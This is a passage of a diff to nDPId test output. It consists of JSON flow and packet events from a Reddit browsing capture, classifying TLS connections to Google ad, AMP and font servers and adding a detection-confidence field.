+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9321,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQan0Owi4YaAsmoBJXgA33AAACBAV4AQMDAwQCCArC10u\/uJU7NA=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9322,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQaPhCx3meEC1CoBJXgOW1AAACBAV4AQMDAwQCCArC10u+uJU7NA=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9323,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyZ9DsIvgBAB+5HpAAABAQgKuJU7U8LXS78="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9324,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUL4Qsd6gBAB+2moAAABAQgKuJU7U8LXS74="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690992,"flow_last_seen":1605291690992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291690992,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1605291690992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690992,"pkt":"qtsDr8lk5EKm5WPyht1gDPazACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGcAAAAAoAL9IIFCAAACBAWgBAIICriVO3YAAAAAAQMDBw=="}
-00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00972{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 